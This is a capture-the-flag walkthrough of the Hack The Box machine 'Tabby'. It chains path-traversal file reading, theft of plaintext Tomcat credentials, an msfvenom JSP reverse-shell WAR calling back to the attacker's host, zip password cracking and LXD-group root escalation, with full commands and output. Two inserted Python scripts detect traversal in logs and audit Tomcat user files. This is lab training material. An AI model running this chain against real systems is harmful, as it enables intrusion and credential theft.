Tabby
Mon, 07 October 2024
Platform: Hack The Box
sudo nmap 10.10.10.194 -sV -Pn -r -g53 -D 1.1.1.1 -p- --min-rate=3000 -sC
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-02 19:18 BST
Nmap scan report for 10.10.10.194
Host is up (0.043s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 45:3c:34:14:35:56:23:95:d6:83:4e:26:de:c6:5b:d9 (RSA)
| 256 89:79:3a:9c:88:b0:5c:ce:4b:79:b1:02:23:4b:44:a6 (ECDSA)
|_ 256 1e:e7:b9:55:dd:25:8f:72:56:e8:8e:65:d5:19:b0:8d (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Mega Hosting
|_http-server-header: Apache/2.4.41 (Ubuntu)
8080/tcp open http Apache Tomcat
|_http-title: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.24 seconds
curl 10.10.10.194
<div class="main_newsstory text-center">
<p><i class="fa fa-rss"> We have recently upgraded several services. Our servers are now more secure than ever. <a href="http://megahosting.htb/news.php?file=statement">Read our statement on recovering from the data breach</a></i></p>
</div>
<a href="http://megahosting.htb/news.php?file=statement"...
sudo nano /etc/hosts
10.10.10.194 megahosting.htb
curl http://megahosting.htb:8080
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Apache Tomcat</title>
</head>
<body>
<h1>It works !</h1>
<p>If you're seeing this page via a web browser, it means you've setup Tomcat successfully. Congratulations!</p>
<p>This is the default Tomcat home page. It can be found on the local filesystem at: <code>/var/lib/tomcat9/webapps/ROOT/index.html</code></p>
<p>Tomcat veterans might be pleased to learn that this system instance of Tomcat is installed with <code>CATALINA_HOME</code> in <code>/usr/share/tomcat9</code> and <code>CATALINA_BASE</code> in <code>/var/lib/tomcat9</code>, following the rules from <code>/usr/share/doc/tomcat9-common/RUNNING.txt.gz</code>.</p>
<p>You might consider installing the following packages, if you haven't already done so:</p>
<p><b>tomcat9-docs</b>: This package installs a web application that allows to browse the Tomcat 9 documentation locally. Once installed, you can access it by clicking <a href="docs/">here</a>.</p>
<p><b>tomcat9-examples</b>: This package installs a web application that allows to access the Tomcat 9 Servlet and JSP examples. Once installed, you can access it by clicking <a href="examples/">here</a>.</p>
<p><b>tomcat9-admin</b>: This package installs two web applications that can help managing this Tomcat instance. Once installed, you can access the <a href="manager/html">manager webapp</a> and the <a href="host-manager/html">host-manager webapp</a>.</p>
<p>NOTE: For security reasons, using the manager webapp is restricted to users with role "manager-gui". The host-manager webapp is restricted to users with role "admin-gui". Users are defined in <code>/etc/tomcat9/tomcat-users.xml</code>.</p>
</body>
</html>
NOTE: For security reasons, using the manager webapp is restricted to users with role "manager-gui".
The host-manager webapp is restricted to users with role "admin-gui". Users are defined in /etc/tomcat9/tomcat-users.xml.
curl http://megahosting.htb/news.php?file=../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
tomcat:x:997:997::/opt/tomcat:/bin/false
mysql:x:112:120:MySQL Server,,,:/nonexistent:/bin/false
ash:x:1000:1000:clive:/home/ash:/bin/bash
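Added here as a defender's aside, not part of the original walkthrough: a Python detector that runs over constructed Apache access-log lines and flags news.php?file= values that resolve outside the directory the script is meant to serve, including double-encoded ones that a plain grep for "../" misses. FILE_ROOT is an assumed base directory for news.php and the log lines are constructed, not captured from the box.

```python
import re
import posixpath
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed Apache access-log lines (not from the original page). Lines 2-3
# mimic the news.php?file= traversal shown above; line 4 is double-encoded.
SAMPLE_LOG = """\
10.10.16.7 - - [02/Oct/2024:19:20:01 +0100] "GET /news.php?file=statement HTTP/1.1" 200 1532
10.10.16.7 - - [02/Oct/2024:19:21:13 +0100] "GET /news.php?file=../../../../etc/passwd HTTP/1.1" 200 2413
10.10.16.7 - - [02/Oct/2024:19:22:40 +0100] "GET /news.php?file=..%2F..%2F..%2F..%2Fusr%2Fshare%2Ftomcat9%2Fetc%2Ftomcat-users.xml HTTP/1.1" 200 2103
10.10.16.7 - - [02/Oct/2024:19:23:05 +0100] "GET /news.php?file=%252e%252e%252fetc%252fshadow HTTP/1.1" 403 0
10.10.16.7 - - [02/Oct/2024:19:24:00 +0100] "GET /index.php HTTP/1.1" 200 14793
"""
# Assumption: news.php is meant to serve files from this directory only
# (the box's /var/www/html/files holds "statement").
FILE_ROOT = "/var/www/html/files"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded %252e collapses to '.'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_traversal(param_value):
    """True if the decoded value is absolute or resolves outside FILE_ROOT."""
    decoded = decode_fully(param_value)
    if decoded.startswith("/"):
        return True
    resolved = posixpath.normpath(posixpath.join(FILE_ROOT, decoded))
    return resolved != FILE_ROOT and not resolved.startswith(FILE_ROOT + "/")


def find_lfi_attempts(log_text, param="file"):
    """Return (request target, decoded parameter) for every traversal attempt."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = match.group("target")
        query = parse_qs(urlsplit(target).query, keep_blank_values=True)
        for value in query.get(param, []):  # parse_qs already decoded once
            if is_traversal(value):
                hits.append((target, decode_fully(value)))
    return hits
```

The same normalisation (decode fully, resolve against the base directory, reject anything that escapes it) is what news.php itself should do before opening the file.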
Tomcat is installed with CATALINA_HOME in:
/usr/share/tomcat9
Users are defined in:
/etc/tomcat9/tomcat-users.xml
curl http://megahosting.htb/news.php?file=../../../../usr/share/tomcat9/etc/tomcat9/tomcat-users.xml
Nothing.
curl http://megahosting.htb/news.php?file=../../../../usr/share/tomcat9/etc/tomcat-users.xml
<?xml version="1.0" encoding="UTF-8"?>
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<tomcat-users xmlns="http://tomcat.apache.org/xml"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
version="1.0">
<!--
NOTE: By default, no user is included in the "manager-gui" role required
to operate the "/manager/html" web application. If you wish to use this app,
you must define such a user - the username and password are arbitrary. It is
strongly recommended that you do NOT use one of the users in the commented out
section below since they are intended for use with the examples web
application.
-->
<!--
NOTE: The sample user and role entries below are intended for use with the
examples web application. They are wrapped in a comment and thus are ignored
when reading this file. If you wish to configure these users for use with the
examples web application, do not forget to remove the <!.. ..> that surrounds
them. You will also need to set the passwords to something appropriate.
-->
<!--
<role rolename="tomcat"/>
<role rolename="role1"/>
<user username="tomcat" password="<must-be-changed>" roles="tomcat"/>
<user username="both" password="<must-be-changed>" roles="tomcat,role1"/>
<user username="role1" password="<must-be-changed>" roles="role1"/>
-->
<role rolename="admin-gui"/>
<role rolename="manager-script"/>
<user username="tomcat" password="$3cureP4s5w0rd123!" roles="admin-gui,manager-script"/>
</tomcat-users>
tomcat:$3cureP4s5w0rd123!
http://megahosting.htb:8080/host-manager/html
tomcat:$3cureP4s5w0rd123!
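Added as a defender's configuration check, not from the original writeup: a Python audit of tomcat-users.xml that flags accounts holding manager/admin roles, passwords stored in plaintext rather than Tomcat's salted digest form, and GUI plus script roles on a single account, which is the combination disclosed above. The sample XML and its credentials are constructed placeholders, not the real file.

```python
import re
import xml.etree.ElementTree as ET

# Constructed tomcat-users.xml (placeholder credentials, not the real file);
# it mirrors the role/user layout disclosed above, plus one digested account.
SAMPLE_TOMCAT_USERS = """\
<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <!-- commented-out sample users are ignored, exactly as Tomcat ignores them -->
  <!-- <user username="both" password="<must-be-changed>" roles="tomcat,role1"/> -->
  <role rolename="admin-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="PLACEHOLDER-plaintext" roles="admin-gui,manager-script"/>
  <user username="monitor" password="0b0c0d0e0f101112$1$3a7bd3e2360a3d29eea436fcfb7e44c735d117c42d1c1835420b6b9942dd4f1b" roles="manager-status"/>
</tomcat-users>
"""

NS = {"t": "http://tomcat.apache.org/xml"}
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx", "admin-gui", "admin-script"}
GUI_ROLES = {"manager-gui", "admin-gui"}
SCRIPT_ROLES = {"manager-script", "manager-jmx", "admin-script"}
# Tomcat's salted digest form: <salt hex>$<iterations>$<digest hex>
DIGEST_RE = re.compile(r"^[0-9a-f]+\$\d+\$[0-9a-f]+$", re.I)
HEX_RE = re.compile(r"^[0-9a-f]+$", re.I)


def looks_digested(password):
    """Heuristic: salted digest form, or an unsalted MD5/SHA-1/SHA-256/SHA-512 hex."""
    return bool(DIGEST_RE.match(password)) or (
        bool(HEX_RE.match(password)) and len(password) in (32, 40, 64, 128))


def audit_tomcat_users(xml_text):
    """Return (username, finding) pairs for risky entries; commented-out users are skipped."""
    root = ET.fromstring(xml_text)
    users = root.findall("t:user", NS) or root.findall("user")  # namespaced or bare
    findings = []
    for user in users:
        name = user.get("username", "")
        roles = {r.strip() for r in user.get("roles", "").split(",") if r.strip()}
        password = user.get("password", "")
        privileged = sorted(roles & PRIVILEGED_ROLES)
        if privileged:
            findings.append((name, "privileged roles: " + ",".join(privileged)))
        if password and not looks_digested(password):
            findings.append((name, "plaintext password"))
        if roles & GUI_ROLES and roles & SCRIPT_ROLES:
            findings.append((name, "GUI and script/JMX roles on one account"))
    return findings
```

Run against the real /etc/tomcat9/tomcat-users.xml, each finding is one thing the LFI above turned into a foothold: a plaintext credential, and a manager-script role that lets that credential deploy code through the text API.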
https://tomcat.apache.org/tomcat-9.0-doc/manager-howto.html#Supported_Manager_Commands
Deploy A New Application Archive (WAR) Remotely
http://localhost:8080/manager/text/deploy?path=/foo
msfvenom --list payloads | grep -i jsp
java/jsp_shell_bind_tcp Listen for a connection and spawn a command shell
java/jsp_shell_reverse_tcp Connect back to attacker and spawn a command shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.7 LPORT=4435 -f war > shell.war
curl -u 'tomcat:$3cureP4s5w0rd123!' http://megahosting.htb:8080/manager/text/deploy?path=/tmp --upload-file shell.war
OK - Deployed application at context path [/tmp]
nc -lvnp 4435
curl http://megahosting.htb:8080/tmp/
Listening on 0.0.0.0 4435
Connection received on 10.10.10.194 54336
id
uid=997(tomcat) gid=997(tomcat) groups=997(tomcat)
bash linpeas.sh | tee o-linpeas
cat o-linpeas | grep -inw 'ash'
647:ash:x:1000:1000:clive:/home/ash:/bin/bash
1493:-rw-r--r-- 1 ash ash 8716 Jun 16 2020 /var/www/html/files/16162020_backup.zip
cat o-linpeas | grep -ine 'backup'
348:# For example, you can run a backup of all your user accounts
350:# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
428:# For example, you can run a backup of all your user accounts
430:# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
671:uid=34(backup) gid=34(backup) groups=34(backup)
1492:╔══════════╣ Backup files (limited 100)
1493:-rw-r--r-- 1 ash ash 8716 Jun 16 2020 /var/www/html/files/16162020_backup.zip
1496:-rw-r--r-- 1 root root 2756 Feb 13 2020 /usr/share/man/man8/vgcfgbackup.8.gz
1500:-rwxr-xr-x 1 root root 1086 Nov 25 2019 /usr/src/linux-headers-5.4.0-31/tools/testing/selftests/net/tcp_fastopen_backup_key.sh
1501:-rw-r--r-- 1 root root 0 May 7 2020 /usr/src/linux-headers-5.4.0-31-generic/include/config/net/team/mode/activebackup.h
1502:-rw-r--r-- 1 root root 0 May 7 2020 /usr/src/linux-headers-5.4.0-31-generic/include/config/wm831x/backup.h
1504:-rw-r--r-- 1 root root 8161 May 7 2020 /usr/lib/modules/5.4.0-31-generic/kernel/drivers/net/team/team_mode_activebackup.ko
1505:-rw-r--r-- 1 root root 8729 May 7 2020 /usr/lib/modules/5.4.0-31-generic/kernel/drivers/power/supply/wm831x_backup.ko
1506:-rw-r--r-- 1 root root 43888 Mar 9 2020 /usr/lib/open-vm-tools/plugins/vmsvc/libvmbackup.so
1548:╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)
locate 2john | grep -ine 'zip'
110:/usr/sbin/zip2john
cd /var/www/html/files
ls
16162020_backup.zip archive revoked_certs statement
python3 -m http.server 88 &
[1] 66252
Serving HTTP on 0.0.0.0 port 88 (http://0.0.0.0:88/) ...
http://10.10.10.194:88/
Directory listing for /
16162020_backup.zip
archive/
revoked_certs/
statement
zip2john 16162020_backup.zip
ver 1.0 16162020_backup.zip/var/www/html/assets/ is not encrypted, or stored with non-handled compression type
ver 2.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/favicon.ico PKZIP Encr: TS_chk, cmplen=338, decmplen=766, crc=282B6DE2 ts=7DB5 cs=7db5 type=8
ver 1.0 16162020_backup.zip/var/www/html/files/ is not encrypted, or stored with non-handled compression type
ver 2.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/index.php PKZIP Encr: TS_chk, cmplen=3255, decmplen=14793, crc=285CC4D6 ts=5935 cs=5935 type=8
ver 1.0 efh 5455 efh 7875 ** 2b ** 16162020_backup.zip/var/www/html/logo.png PKZIP Encr: TS_chk, cmplen=2906, decmplen=2894, crc=02F9F45F ts=5D46 cs=5d46 type=0
ver 2.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/news.php PKZIP Encr: TS_chk, cmplen=114, decmplen=123, crc=5C67F19E ts=5A7A cs=5a7a type=8
ver 2.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/Readme.txt PKZIP Encr: TS_chk, cmplen=805, decmplen=1574, crc=32DB9CE3 ts=6A8B cs=6a8b type=8
16162020_backup.zip:$pkzip$5*1*1*0*8*24*7db5*dd84cfff4c26e855919708e34b3a32adc4d5c1a0f2a24b1e59be93f3641b254fde4da84c*1*0*8*24*6a8b*32010e3d24c744ea56561bbf91c0d4e22f9a300fcf01562f6fcf5c986924e5a6f6138334*1*0*0*24*5d46*ccf7b799809a3d3c12abb83063af3c6dd538521379c8d744cd195945926884341a9c4f74*1*0*8*24*5935*f422c178c96c8537b1297ae19ab6b91f497252d0a4efe86b3264ee48b099ed6dd54811ff*2*0*72*7b*5c67f19e*1b1f*4f*8*72*5a7a*ca5fafc4738500a9b5a41c17d7ee193634e3f8e483b6795e898581d0fe5198d16fe5332ea7d4a299e95ebfff6b9f955427563773b68eaee312d2bb841eecd6b9cc70a7597226c7a8724b0fcd43e4d0183f0ad47c14bf0268c1113ff57e11fc2e74d72a8d30f3590adc3393dddac6dcb11bfd*$/pkzip$::16162020_backup.zip:var/www/html/news.php, var/www/html/favicon.ico, var/www/html/Readme.txt, var/www/html/logo.png, var/www/html/index.php:16162020_backup.zip
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
echo '$pkzip$5*1*1*0*8*24*7db5*dd84cfff4c26e855919708e34b3a32adc4d5c1a0f2a24b1e59be93f3641b254fde4da84c*1*0*8*24*6a8b*32010e3d24c744ea56561bbf91c0d4e22f9a300fcf01562f6fcf5c986924e5a6f6138334*1*0*0*24*5d46*ccf7b799809a3d3c12abb83063af3c6dd538521379c8d744cd195945926884341a9c4f74*1*0*8*24*5935*f422c178c96c8537b1297ae19ab6b91f497252d0a4efe86b3264ee48b099ed6dd54811ff*2*0*72*7b*5c67f19e*1b1f*4f*8*72*5a7a*ca5fafc4738500a9b5a41c17d7ee193634e3f8e483b6795e898581d0fe5198d16fe5332ea7d4a299e95ebfff6b9f955427563773b68eaee312d2bb841eecd6b9cc70a7597226c7a8724b0fcd43e4d0183f0ad47c14bf0268c1113ff57e11fc2e74d72a8d30f3590adc3393dddac6dcb11bfd*$/pkzip$' > hashes
john hashes -w=rockyou
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
admin@it (?)
1g 0:00:00:00 DONE (2024-10-06 22:44) 1.587g/s 16462Kp/s 16462Kc/s 16462KC/s adonisbrizo..adamneil17
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
ash:admin@it
su ash
Password: admin@it
ash@tabby:/var/www/html/files$
cat user.txt
df85a736758771f1395ad9f0a328188c
bash linpeas.sh | tee o-linpeas-ash
cat o-linpeas-ash | grep 'lxd'
User & Groups: uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
/var/snap/lxd/common/lxd/unix.socket
uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
uid=998(lxd) gid=100(users) groups=100(users)
git clone https://github.com/saghul/lxd-alpine-builder.git .git/lxd
cd .git/lxd
FILENAME=alpine-v3.13-x86_64-20210218_0139.tar.gz && cp "$FILENAME" /tmp/ && python3 -m http.server -d /tmp 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
curl 10.10.16.7:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz -O
10.10.10.194 - - [07/Oct/2024 00:25:51] "GET /alpine-v3.13-x86_64-20210218_0139.tar.gz HTTP/1.1" 200 -
/snap/bin/lxc image import alpine-v3.13-x86_64-20210218_0139.tar.gz --alias alpine
/snap/bin/lxc image list
+--------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | TYPE | SIZE | UPLOAD DATE |
+--------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
| alpine | cd73881adaac | no | alpine v3.13 (20210218_01:39) | x86_64 | CONTAINER | 3.11MB | Oct 6, 2024 at 11:29pm (UTC) |
+--------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
/snap/bin/lxd init
[...] Keep pressing enter to continue with defaults...
/snap/bin/lxc init alpine privesc -c security.privileged=true
Creating privesc
/snap/bin/lxc config device add privesc rootfs disk source=/ path=/lxd recursive=true
Device rootfs added to privesc
/snap/bin/lxc start privesc
/snap/bin/lxc exec privesc /bin/sh
id
uid=0(root) gid=0(root)
cat /lxd/root/root.txt
126560f3dddac7cdbaf8ee8bf7030341